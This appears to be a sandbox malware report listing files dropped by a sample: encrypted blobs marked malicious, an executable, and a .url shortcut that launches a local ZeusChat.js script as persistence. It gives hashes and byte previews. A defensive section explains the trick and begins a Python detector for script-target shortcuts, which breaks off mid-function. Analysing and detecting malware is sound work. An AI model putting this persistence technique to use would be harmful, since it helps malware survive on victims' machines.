                                                                                                    Preview:.b+..5+...UB&f.........!...O.p.........pK.y.......l.v$.>?.g,=.9b....[..|".....GH..C.=.....&.i&.................566ayOQ.........&5.=.O.....+(.S\..azC.8.j/.....P.X.1.....Kn.w.bT......F8.9....!._+|..V&}S.f.o..9..3......}x.......]]b..>6..V5.*.........A.....5. ..h.`Ot.!...l.M0:+..k......f...UnSY|.....>%....`C.D*....Y....$3.._..yl.=V..@ZW+uFW....Cs..L....}..H..h.Bo...o......dc...)<.S..ub.f.6..........7..-z....V..Y...2.`......}..;...5.%S.E/..!....:..07...P....Q.....y.....~v..C{@C.....u..!....v..n..[.-I:E.......)...h...*Ad#...K...#.gF.S.}.x..[<T..>*..&].....I..OC.S.j...@.z.U..I.._..K.xf..0N......!.K'.7 ......b4D.h..i.......4de.U.lY"....(...n0....N..X..[../.c.h.k6PPB..R.";,.My...R\.b-.c....gR.[U....V.L.).H...\2.c..m...tM...9..g4....G....p..6....C...,.y.h....@...y{.\$*...4..M.["..@bl.K...T.e}`...G.w....B......./..~.:.im.%t,..#....T`..J.-.l.4.R(M.,_.&.....}Y..Y.Q%.u.s!.. .%.E..C....U.~n..0."j./03b..F....Qk.....\~.q..~.Y.....=}.....ZC.y...........K
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):89088
                                                                                                    Entropy (8bit):7.997709101597699
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:mfDiHrvCsrM2rpqefuBg7gwjjRWqLT5NXJHtY3IeKPLPBQZH:kOHGsrMYpqefuCDjjRv/JNneg5i
                                                                                                    MD5:51852F7D87628C76B7E7B9AF71DB40FB
                                                                                                    SHA1:15E995B46EFE992DB94AD66EDC0D2A154AA2F4E7
                                                                                                    SHA-256:A2BE9C05195511DF2B56CC5C6DBC001EC4E493B67D1B367D6278D8B92A509999
                                                                                                    SHA-512:0A50FAB6E1B26D8FB8A064727E7E30659210DF8EA2690931B6771738136C139511E1464BAEFF40CD19E5B69EE905A2D2462A7014CCADE939889ADF0104B98C02
                                                                                                    Malicious:true
                                                                                                    Preview:.;...d..-i.W.b..._...8.i....;...`..[.{p..T.....c...h}..Z..~i....h2UBt.j..x.F.]I8.E.g....\..5..]..w.t..LW.S\....Z._R.br[_....W..)w.4...Z...c.8...z....&...2Yx..m-..W.2,\.....-c.Zs...:dF........ ..Um.3.0...5......v/-.0FY.p...DS.l..e:..Y..|l..rw......nH......f4qY<g...T)9..F.........wQ....{....Zw.!m..Q.]..2Q.....<8......E0...x.<.f..<. ._.....x..y8..<$.v7@AS.x,.g.@....)...l9...^..O...<0...c..B.o.E.1...c..H9m....V2>.E..E...8.C...^./Bl .f..f._.O(......Xr....W.#.?....N.....?gtPu9..j.s......P.L}&Pi......|e^.X]8|R.....w,.w..8..;.6.a*.B..C..ah(0...."%.Z......C.f,..U..!B...._..=.c.P.S.j.Y..C............2qW..1.u,.....')7.X.bJm:>W.h..K.M+A[ .QGIAf.>.!`...5...W.\..$.......]w.7.s.z5)L.\..j[yUU...u...#S..g ...jeZ\..].}sB../S..Y.u^..s...Ty.<..>...Y.}..9..Gx.,...f.N'.0.$v^.....K.$$.....Q.....Hd..l._0#~....H+..|/[j_..g$......t:U....U....j...Q..b...8.t.p...N4.........I.(i\6./........:.Z.....Z.J...!.. ....b.a[.<w..........l,........~...~.......oJ-....!.
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69632
                                                                                                    Entropy (8bit):7.997475560002346
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:k5LCo+47m90hRXIknGR6LzRIpL1EFEQ5TWdbDoSdEMIiuv+R9:klCo+UhR4aF0L1EbTW1EAOvs
                                                                                                    MD5:D28068443413CA5AE14CCC6E54033521
                                                                                                    SHA1:F42C32D6CB440416A61E841F700D6EC8EFD8D85D
                                                                                                    SHA-256:48BEB5AD04243BC03837F026788007D970521E552F1AD5A0CDCDB9D8AC52CD26
                                                                                                    SHA-512:75955593B4E50F8BE98662214E9184DCC41567B752833D068244C8CF9CD4D0BA9E7919F05468D4784BE4A28A5D5A1DA88AA7980670914A951E78CC9630ACE76F
                                                                                                    Malicious:true
                                                                                                    Preview:R........~......3..r.C^."...B.d...m..J..7....Q.1v..`.B].A....M..c[...ZUs.}..=.T.......y..=D...V1.#..-..a~!.&.*|V.5..N`..[z..4.K(X.......|..C..T.&ek.....~;..l.}.s....*.E.D.A....1$..?e^q..;..-.-wt......S.......`..[1.R.s......Cq.g..fk.8.....Rs.n..e..8 ..-.q...%....4...:J.BP...p=/.<Q.L....1..D........j4...V_..E...AC...|.>....pzjV....b.....?..gC.W..h.l........$.S.:x..|.b.....xd..{.-.)I*.y.l+...&.!.:m]..9.z.D'....w.J.q@9.....4l..+...0......_.>.~8..vP..A5q.b...U..."...{....PO.z......&......L...;&..|........O...n...X&v..[..c*..VA.}.Y.K..6g./..f.... .....z/.....Z......U.6Ml.4w.......K5.R..".<.aE.)3...;.....<ZY(...4T.....+Kr...(...$..R$.R"m{..N.<....Gxq.38<..`...4...n..G .j=.:[l.Y}SUaYZJ(.YEj.H....#..O..&.K..s..$....?.../...lWJ....y..&.....z....$S3...X..'.hGh...W..X..6...DL...)G...b.OH......V.g.....C...u@..+c...Z..L.s.<E.!7..@.'.G..h)@S'&i.rt....[..W.W.0.>.i..&.;.C..0..t.X....*....|.,P..s5...6.S@?M.P..s9}2i.c4F..r.........'].>.V...?.
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80896
                                                                                                    Entropy (8bit):7.9976486211829085
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:9ait+XnbwYs7xpi1WA8RJim+8Q0/bSM1Rv:1t+rTka1WDRJs8VB
                                                                                                    MD5:17779247EE739CAE13F52290F21FE396
                                                                                                    SHA1:D268B658413F19453661AD9FA54A07010ECEC8D8
                                                                                                    SHA-256:F71939F06B91F662944E739CBD3C435AAC9E0BE186A1A3EBA764ADA981DEEECE
                                                                                                    SHA-512:76AC6CD745E4D599D8B4ECE3840F1AA66ACBFA894842A8517D321238D07687704E5547697459784432B783A52374808E2C1B24E2917B2AB7258932714738DE13
                                                                                                    Malicious:true
                                                                                                    Preview:.....5.Z.\#..'....~..dH.iJ^....!.tH...e....o.RU3............./...Xm`...g..G..c.b...}.Z..y..5f...k&..j...a..@83.O.c._..]....J=.#..@.`\....+..[)..I.C.L.]..1.-8w......]$..RpU..*...r...=......5Q......X....<'E......z9.g..g;..s..I.........U.j`.7og..0.Y>c....Cz"........=....K.....Z..I{...T......F...1.t_"&..4=H....T5@.+......W[..7c.'5.w..~w......m...[f."v...q.@P..E..XX:0.0.......D^...wb.n....t5.M.....j\x.4....Mu-\_.)..zRw...v.!%z...._....(..."(...V6...B..>.x._.O..a.C5....b.X.]..*@..8....4e.R..E.\.;..n..)..!8..R;2l.Y.`=>Tx..$..}....;O}f...g_..A..W.fA......]./....L6..Z>;[.P*p0..&..tZ?!qiLW.^->1.G+...f....oD.0...:..2..T.... .U..)B...}...q.......i....~.[Q.8.........#.~`.[O.xX.{e..*...5/#...5].6)ME.\..3.0wT=..Z5.....NV$...4..1..6S`o..'.t......T......).b9Pj....9W...k(.T.f.X..w|*...N-..}.L?ZU\..#J..3.|.b....;.&U.M ]..w2x...tT.oSRg,q)-3.OS*.ZC.1U..:6}9..{.9........?C.....YVX.$........Z..8V.s.Y....T:b.o'..`....-.........+.j...nS@.r1.m..`pa.).c..[.t)........
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74752
                                                                                                    Entropy (8bit):7.997643505588514
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:/8jmLaw/2vM+yBLoEbabkCg11bLutq9oBDt8fnALeStIuKGmhLIsV9l3:/8jmLa8/H5Rx9ug9ottyAygIuKVr3
                                                                                                    MD5:7C647B0706E80A17DCE3805F4D133CC5
                                                                                                    SHA1:1C8B39A85852185E9D0CFCE138F9E6D2B90A0898
                                                                                                    SHA-256:2A879EB4AD27C42721DCA80A6245D6A48813BCF6CA0D904199F506CC6687BBF1
                                                                                                    SHA-512:7D991137B90A587BFF29EDEB02BA2DDDD5D4720018A0A68973210D81FB326634DA17897D96CCF74819C97FACD3055190C56D2E90A801A27F76FE95C23167A168
                                                                                                    Malicious:true
                                                                                                    Preview:...20a./P!.....%~....E.PF.>#}:9h._..j.h;.h.a...-.O.'..$.wE..8.~...9...WS.exD@..x.m...^vY....^..A.~..'.....I..ke[[..&,.8.4.r.)..2x...%m1+.,..j,by.........e.......7P.,.0}..Mbk.GD...t..u.......Y.-I.m.P..Vn....\......<.37../.7.H..r...M.H...Q:v*LPQ.F..v.#.I.=...v,.=...M....{.X......]w..@.H.N...Z..........$.U...1~_.Z.TC.G.>OQ...Y$.E..?..16..y.$.x.......|:.6.'a.T+:=.jHW.h..+...X.i....n.[.7.....-.3R=y....$....2.lR...M.}I....E@G~.(..].Q\A.?....-.`..d&.........F...q..#..\.21..T..'.,t .q.....y.\.pr........6...D.E8t.@R.......}...X.;|.9.HW.hl9....a.}0.IE.hK..jeW.>.w..Y..........j.^g .Z.;.!...\.>./..B.A...>..[..>*P.$6.?g+.i(0w?.0....T..\`.......[|TiD.....j....B".....v....0..M~}..l.kD..MM"Q..%.7..l.;..XO0. ..e.~.....T..%..{.m...h7........G.u!........x/..EK%g..,?^qd..6._+x,+.".2..._.=..ae.=.'..X.5pH.}..~r..Ge.......X...R...W.h..Y..<\..b...9[F..5.w....+.%.t.|^..T2......N.. .`..y}.."....5..&.0.Z.I.N.......f...$C_....1... .f.5...&.".[IU<-.h.....6^GT+m.....
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):96256
                                                                                                    Entropy (8bit):7.99798906004204
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:5y8iyJUmvI2g3KhAWZAI5tYOc8pjmz/3FVsg2X8fkoajjPPCZx+NN7QQYCkyya+l:5Pi2vI2h7bzo3FVsBJqZx0sQ7kyya5HY
                                                                                                    MD5:BF358168D303797778D6882D4EEEB7D2
                                                                                                    SHA1:DE8578F5F94D6F0AAB03EA978CDF592A27F29D40
                                                                                                    SHA-256:86192E5A608BA6C316954F7B01A3D32728B0C9E7D2BB5F2CCFFE7C300E65612F
                                                                                                    SHA-512:AF75E281E80DEF8AD01B494ADA6919D4EEED7509987DCD1C0966F505A98FB14BE494F5C85DE01F26D752415B54A9FE5C385DFD024A0E1F3E3EEC0F136DF78E6C
                                                                                                    Malicious:true
                                                                                                    Preview:=...M.K..M..F..%Uh..G.ADJ....DQ..c.#>#^...;.q.X....?.T....TE.Y..F1;..)..e...+.msi..........eb..dg..RY)..\..............J._....{..F[m1..U..'........|..A...3.iY..q.d..Re...z.D.Z....v,..z.A....g.{.kB....4[...D;.hB`.Q...`......6..fy.b..: }1...3y............]EL].c'.||...........s|...+Bo...>6..n9w.m4.k.hA..t#...(V....H4%...E./..Z.Q%.,.j.h...o.....]./9Uhc....R.^..L.I..mX.(........V...".8.......6.m..._.-..H.jd... ......1.y........i.4....+_4Y.D.^.a..;.......@\.2...T..$S.D.Em#'N.....}.P...[7.d..x.;.#............C.k.......?.|a.HE...g.KE.Y,......]...8G(2......<.7.D....u..4o.>.......|...0Qb.......v.. .E: B!.f..l..*.7...(........N.`JIp?..r.hv.....}.....D..(.GD~&.,.NZ...E....v.~"..|w[Jn...@.>.......H...J.-.;P.UQb.zY0~.......+...&(..=1.[].?.bsB...Pf..<.j.....k..{r..(..."....d}.6j...f...lA....?)..u6..d...yY.0..7oF>Y..A.t.>..B ..s......*......`#..."q....y....70.j..H....3.{.t..D..O.q.F.(.....s......~.....\.#c......u..K[5....].....V.
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:OpenPGP Secret Key
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97280
                                                                                                    Entropy (8bit):7.998067775958086
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:h1xiordqEnAINwPPozO/ltaSovHtbfJ7CQ8KWFvaeCOvma8a6TEyYb3bNbZKB:fhd3nbNcow+BHzCQ8KWF+OupTE/TbNbC
                                                                                                    MD5:AB3992952FADD50CA0CA5608F1F7F570
                                                                                                    SHA1:A67DE56BDDF50265DF0EEDA6DB470086F712D6DB
                                                                                                    SHA-256:BC70E59D3EB450DF8031D425101D0DD5F0A150BCD0D6B5D95CAE455B0E5790BA
                                                                                                    SHA-512:0539ECF23D8E81A2C5B6B51CB205E48871144612F66D3F387BA69B7799F92FF536973F87DBE52121335F54BB5E35BDD64DB7673E23488328DAD31A3CC265F33E
                                                                                                    Malicious:true
                                                                                                    Preview:...q.L.....~ip...$OJ....q#.<...,z.P.....r.%.... ...|j`J.5=dEj.4...5..U7..C .X..&Q.2c*.'$......o.-Q.E.D.y`.......~..\.....j..RyY;.WU_.2.h....t{s........VV...j.]\!...9.b......$.?rby.6N....n.....Z.8;`...]..Lg.p.7E.uu.c.h97...F..J.C./.q..@L/.}..._.;?I..@.Lo..u.UDr.^{s...v....G .....Sx=."..l).h{h..q.c.0.<..l............bTh.........N.'_.o........W...+d..e....X..h!_..,v.......)7.....j.....,\.G...,2=...c............P......xu....@.~..........8..>*=.....4C}..j}We2k.....%.D.m.\x...O.B.4......,^....v...m..3.f.Z.vE....:..........4..=AC.#.n...-l.I.B.s^.-.......-.^R..`z..N..Z..ck.........../.<`.."J.....L...w..D.......a......_M..U.Wj.C...j.9....e....#V"....z#nXU.......w]..T..'#....../.......gn..G}.k.KP..j...#+.7I.].Y2...5"...z\..-.....P.dK.n.#......T...........c.;C.......(.....g.....(n.x..T.Z`..'...XE.........v....F(.|*.X...5/..|.;G'Xc...y....-..M.........Z...".4vV.{."&......ZP2p.?>.t.......u=.........m.....m..d..I:....r..HZ....z+.......fw1m1{..Y9..^
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1065128
                                                                                                    Entropy (8bit):6.43820773264071
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:SAwciuvaj8l4LEWumcKYB5Wek2vY+BYssmNolbmmPmJ4Ve+aaWBS:SALTBaLETmcKYB5WH2AwjsLbmmPmJ4Vt
                                                                                                    MD5:C63860691927D62432750013B5A20F5F
                                                                                                    SHA1:03678170AADF6BAB2AC2B742F5EA2FD1B11FECA3
                                                                                                    SHA-256:69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                                                                                                    SHA-512:3357CB6468C15A10D5E3F1912349D7AF180F7BD4C83D7B0FD1A719A0422E90D52BE34D9583C99ABECCDB5337595B292A2AA025727895565F3A6432CAB46148DE
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........1.q.P.".P.".P."y..".P."y.."QP."y..".P."S.1".P.".8.#.P.".8.#.P.".8.#.P.".(u".P.".(q".P.".(e".P.".P.".R."^9.#.P."^9.#.P."^9.".P.".Pa".P."^9.#.P."Rich.P."........PE..d......^.........."......:...(.......R.........@.........................................`...@...............@..............................[..|.......h....@..To...$..........t....p......................X...(...0p...............P..8............................text....9.......:.................. ..`.rdata...A...P...B...>..............@..@.data...P........P..................@....pdata..To...@...p..................@..@.rsrc...h............@..............@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72704
                                                                                                    Entropy (8bit):7.997454633063599
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:vXx+HOb0XDoXJHfl7Z0gtZaVjADAsSuq3gbGnvD0qxThfrk:/UHsMDW97JkVjADAXx3Xn4qxO
                                                                                                    MD5:5ECDE821195E874D98C846D36A61D9BE
                                                                                                    SHA1:D58B5F754F7C073C75556C191673687EDD6F9FDF
                                                                                                    SHA-256:E6FBFEF6271FF5511FB38D40831E25AD9B92535A66621E6CE464A98386F4649F
                                                                                                    SHA-512:06F0C80617C836C3B3E8F9197F9AEAA97AA6A8B0AD92DF09E44ED39D435A8107E17145B0665CBE3A7174B74C747A4CEF8AD09FDEBB309CC34C85B1936588C570
                                                                                                    Malicious:true
                                                                                                    Preview:.....a..EI..FiW....%...l"M..R .F..$M.c. .[.....=... .O..]P..s.6n...T.W+..".M.....h.H5.-.Hi.`...%0@...Ac|..u....6.A.P..#...>...w..=:n.r.<....._......K$....x...!./..8\.....~..DH02.{).&..kJ....PC.8`...^.@\2.i1.......q:.4V..~..g...4E.e<...i...w..g..]v@.Fr.$...M..9.AS.GS...o..&.+.e...( ..*c..{.!..8..L...G.U3..Q.j3...$......X...".7...m.o....m.O.1l...]8~B.a........|..Lo.ef..PpkI~..h`=.<.K_.+..I..d/..6.>E.....\..~....^...67...=..cf.D:-.....e$HvR......5N..O....].ZmREBcji...=o..Z.hH..=2k.x.G=i..I..D.L.~2..ws.;~..8.j..K.=.9.gV.....4G..fF.!.U.=.<O1?..`k.d..ql.?....l*.o.<s....z.N..S...F../.T..6?jG..D._~.j..q...y....l.A:.i.O...y..cm...e..0...^`$.{.z.Y...b..gu.......K..0....^.....V.k.r.^......./9p...x{$@.4...h.x...a}........7...6.Xk.LV....l..p..s.S.y%.VR...PV.Uq..m..m...}Q..o..3.e.......Usj.-_.X,>N..w.X..>.$..{/..~f.....u.q.........G...,..eK.?..s2...j.:>....z....r.g.n..F..'.......V..x4.2..t..9.92.8..tE.....i.."fM...n....Y..+..=.....5.....O.y.l...c.e.......t.......
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):81920
                                                                                                    Entropy (8bit):7.997919448781185
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:M318WuV/Lje58/NgEryXkIeIWnWeCZGfc5RS7SazCt39k7siBc:u1N8/NQXk9WD550GazI9k7sP
                                                                                                    MD5:D974201B21B17C64319B3AFDDAECDF05
                                                                                                    SHA1:101C54415A230BAD753C8879A76593FFB19897DA
                                                                                                    SHA-256:83E4A156F628135F8C3AAB71C0CC15FD426E5FE3BEF93ED37ECF3E540E702A45
                                                                                                    SHA-512:74E735D48E733CA719BC70FC9F15F0185DF5E6F26B600B805130C4F235DEDD3A476E590264A19866D1FA492A11CB8C5CF874049F54DB598FFBD2855E9EC8A65B
                                                                                                    Malicious:true
                                                                                                    Preview:6>......k ..+.C.U.. ..mc...)Y_LM...<.?P..W...;.]p....w jl......H.=.&.P..dy.E...Nf?....Cb..2..quck.YNV...%.(....7....q@-.[.lC'D.=...)..A.Q..5.<...$.p.(li.B..........K..f.j\.....P^.0.mK.X.[D|..s}:>...6Y.....z.S.8..#O.%1..;......I...B..A..ch...a.s.-.G.q..m].....jd>m.g........k}.q.fyp..l.9.^c.J......p...V2....c.K[....5a/E.4[m.?...9.....KDL..HU..6U.Rp..Z..,F....D....Z.P.L`...G.!.!....3..d;4.t.....T.)wQ[......Q.D..D.PU0.f{.y.q.t.Z.>..f.......-$......'F........M..I .....-.['.-.@T.&'.<...h.....T...*.......s....*...h.<..=B.M.f..~b......l...{....z}.?.1...ARt...D...-......v&..d...{...H..]...>.......Bh..C.r.A.R..C;A2.....0.Y........L........%..".E..C'.;...L...G...Z....q.0.K.'...B.,.Q(u.....y~@M2|E.._Fm..Q.'h8_....S...l..Z.|E\...H.=......$`ld.&@}7u.C.*.qv......O."....-oI.:.......PY..s.N.3>.|..:.._.k;l.a.....@.(G.ZD...c...|\..'U.u0.....Ur.._n...}^.N.K.G...8.`...p.R....IL..]i.9.m..%......*.q....Av............cB. w..KI.$:.?.?......f.b.\.:...p.3.t..1....~...
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):88064
                                                                                                    Entropy (8bit):7.99807412881169
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:dwYJksN32wTiAc1X2LnS2N2zIdkFvbbFQWypC4FA/4Z2/avYoz10Gu9DklUJp34P:d9k8mrAwGLS2N2zImFvbbFzcCN/livYs
                                                                                                    MD5:3BE74FBC6EE02888C808EC92AC040F44
                                                                                                    SHA1:9762530702FC951013D2EF1F9152925DA7FC0E10
                                                                                                    SHA-256:375F7060E748B8A0F48ACA18638A2DC0E94574BE8963C44E689F96321BD1BD11
                                                                                                    SHA-512:3FB2B1CDE21DCF11F870B1DB3D9DA44AACFE01C0B625B1FB16FACDE9C8A99DDEE8076C14828D8623A8DB4390C3C2FDE25F1323E864F5A04196176F9A68F9DB5B
                                                                                                    Malicious:true
                                                                                                    Preview:`.8.6z..h....;L...?....!.p.......=..tSJ..{.Ce...8....D.J*.I..pg.<]......T .I.g.^_4o.}.....(Z...z$.>.ff..T|.t..:..#...Y...}`h.r...<..f..]<r.L..=...Zp..,{..2S.C~bR.....d...Kq.....T..wp\..;.t...6(@.Y.&...p.....b;Q.......2.....H^*..W.f.v.1>r..:P. .h^..tVfQ..H.....%Q......#.V....xv.Z..<{........2..B^.......kX..>38..L.....H....+l.y.1AZ..Tm..T.{.8....w.n;s..[......7.KEk.^.s+\..l.G..(M.>....|6g<......S.F...#..=Q&..=H.c.[R..v.8..v...[/wc...eP....,..q..t..(h.q...m.+.2........4...r....$2....7H.X..Zf..!.cf.....E.Cx..+......K..9~.>. .6..[P.dt...(VuQ....D..|l.5..#.!..F..O.#.g.xbf...:.<:.....+An'."E..m..D.'..,......*....:.TDmSn........]..y..f.7\...=k../.Tx.0._?..(.1/P!.yb.%.....4...w.....r.xD...o.af.`....4.h6a.*..m......T..a4.s.E2.-..Eo.>..j.SCp\.*a8....Y.-)..... ..$~t,R6.&,9....{.41.J0?...eQNz...x ..^...r.)8..DBp..& ..xt.7@L....0fdSH.J....Xp.DC.lF...N..Y4.`.....e..qz.......j.t...G.@..W.z.....VQ..%q...~hc..P.r..-&.Q.KA..a.Yf.$I.:...sp.[L...J.3b....[...^G...Nv.
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74752
                                                                                                    Entropy (8bit):7.997554059646999
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:kxYY9JzAu6zWvOkaaq/Io0ewysKdYodz3jzZKQnhpgjPmo9NAHMthog:ivHAu6SvOkapIo0PXKdYw3jzkQhp6isF
                                                                                                    MD5:5E994F39CCE9E10B951340C50ED7AC57
                                                                                                    SHA1:3AF9BCC59EBA50B027DEDE0B713B3560AB033E92
                                                                                                    SHA-256:BF779307AF2D71D7DDD99AA8E239755C0B4DE961CD0FBF0620DA0718870C2CB0
                                                                                                    SHA-512:5E1B9606C794DB160C7C17256999DD87F9BABC1C18F16C60BB3229AD8A37DE3D3106914B44C865F44C51E066F04724E399E7BB9487C50DD05FC38068E3B4AE54
                                                                                                    Malicious:true
                                                                                                    Preview:5..D.._K..gN...(s...l=.~...k&K.Y.:..%.D.V.8...=..._......n.9M.W.TG.a.T..K..........~..Z..M....5....\..q.9|&..6.").G....~[._0....f..s...x.....W.Xy..j.%{@.3.t..S.Q....X.<:.RH"..3..2E..@.B.UH.A.._....N..Q\/y.......e(T........&Q...v..)d.j}...h.?oD.=i...@..~..........(1...p.&..-.....tU....6...\9....Zg......U.@l..|.......F2...-<...#h..'....+..A.'.MY6wW.'4.#4.........W.r......x....Vb<.Y!..b.nM.U.'...9....8...."..G.....c4.&Q.....X.......5.wG....L.. K....C.'b....o.....M..~N....1.yDG...@....&..%..]..@..........g...P.7...|Z...;.S...x...8Z..`.2H.t%..P.B.q../1.qswCH.....N../..D.|.f.f. g3.vk..Q.j..z(.....?$..c.........{.4wa..HQ..._)....R.]..O..^.E.q..r.y..=.C....Dw...}.k....d...g<....*!X<.!.:'_.._..U..$l5.J.T]..er..Xt.....M".g.w.7P.z...x6.Z.sa..e..8*..L...w.....G....3XpG...l.c.LM......^..6/"..9?.ewo..../e.z....u.kb.nz.c/........s..St6.d~..H.. 2.A.[.KopZ3...`.....5.).C&.h....0....k..+!3!...."..........\.+fY.Mr.QG..a..E......_`8...3..J
                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):99328
                                                                                                    Entropy (8bit):7.9980906917164045
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:Lul0o74FHEfDEYdYCgssVqna1Q9qJZShA1at1XpbgaDxeEhTuLEJAhFBNDQhwMub:E0tFkfDfVgjGhvXpkk7IEJAXQ2MuXr
                                                                                                    MD5:8BD430500D4C1E0562DBDEA031FCC935
                                                                                                    SHA1:21EB8D97B4A27334B285C0EF00E9A436DEA13A08
                                                                                                    SHA-256:9312BD3FE3E138A6C6BBD1D253C493E171CABE1207351AC8A0AF19B4D3097BD0
                                                                                                    SHA-512:F5E4055F89E18B31170DDF9609FAACC6F6899320EB1299E56B8DC674E3C40CDB0B1A46EE4012AB1D84D5FE8EDCBC81B39D0F2F0ACBAEBDD98EF356E865464C31
                                                                                                    Malicious:true
                                                                                                    Preview:.I.h....N.N..04vT..6......@..W..o...5xRz.)...I..i...WO...f..?.....y....t.f.:E^..r..x.(...q.;.n...A-..6.....~ ..w/...v.P..O...g_.Sx.E.."\..6h.~....~..V"...Z....`.+....e...M.E.P....ck!.T...AM....R..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....R....G.L.'.F...h..............>.......>......kC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r..|.&..,P..Myn.2..t.W....^.8.Z!...W[.>..8D...>...i..m......_.}8.5...x..2).U.j....R>..#.~.\.......$h_.8..D..X.U..~X...)<.G...]...P9(..f/.._..c.Y.^...g[.T.bg.D....w$ .x9...#.K..{).....A...V*..!.+.f./J>I5.._yN`.7l..M.....a2.....||>...z.QRG........K.G..;.rda(..{.l5<...d...Q.....x.=.4..W?_8.<Oj<..;...hy.C.."x....x....g..0.Q..i. /.j...v8...iH.>...
                                                                                                    Process:C:\Windows\System32\cmd.exe
                                                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" >), ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):94
                                                                                                    Entropy (8bit):4.887734565173362
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5mcVIFzRLF:HRYF5yjo923mc6FzRLF
                                                                                                    MD5:9B0DD8841FA4337E06FAA0248CB8BE50
                                                                                                    SHA1:49052752C632FDD3ECE047AED856E7117B2B2431
                                                                                                    SHA-256:2A4F125DF75228843D8DDC45ABB7804EA97A1AE4FB1D886F4D1A1EC006A61D66
                                                                                                    SHA-512:AED4D54CFBF58EAB5BCCE26FFD4D5AA959508E053D3752C1CCE8B24AE7529B4733574250CCD67C4A8925B972DB5554D8D8CAF5196B328254E0D3369FD14AD1FC
                                                                                                    Malicious:true
                                                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\CyberSphere Dynamics\ZeusChat.js" ..
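The shortcut dropped by cmd.exe above is the persistence artifact of this sample: a .url file whose URL= value is not a web address but a local path to a JScript file, so opening the shortcut makes the shell hand ZeusChat.js to its registered handler (Windows Script Host). The check below is an added example written for this page, not code from the report; it parses the .url format and flags shortcuts whose target is a local drive or UNC path ending in a script extension, keying on the target rather than on where the shortcut sits. The first input reconstructs the dropped file from the preview (the report renders each CR/LF pair as ".."), the other two are constructed for contrast, and the extension list and the file: URI normalisation are assumptions of the example, not something the report states.

```python
import ntpath
import re

# Assumed list of extensions whose registered handler executes the file rather than rendering it.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1", ".bat", ".cmd"}

# Constructed inputs: the first reproduces the dropped shortcut shown in the report,
# the other two are made up to show a benign target and a file: URI variant.
DROPPED_SHORTCUT = ("[InternetShortcut] \r\n"
                    "URL=\"C:\\Users\\user\\AppData\\Local\\CyberSphere Dynamics\\ZeusChat.js\" \r\n")
BENIGN_SHORTCUT = "[InternetShortcut]\r\nURL=https://example.com/\r\n"
FILE_URI_SHORTCUT = "[InternetShortcut]\r\nURL=file:///C:/Users/user/AppData/Roaming/update.vbs\r\n"


def parse_url_shortcut(text: str) -> dict:
    """Parse the INI layout of a .url file into {section: {key: value}}, names lower-cased."""
    result, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            result.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            result[section][key.strip().lower()] = value.strip()
    return result


def shortcut_target(text: str) -> str:
    """URL= value with surrounding quotes removed; file: URIs are turned into Windows paths."""
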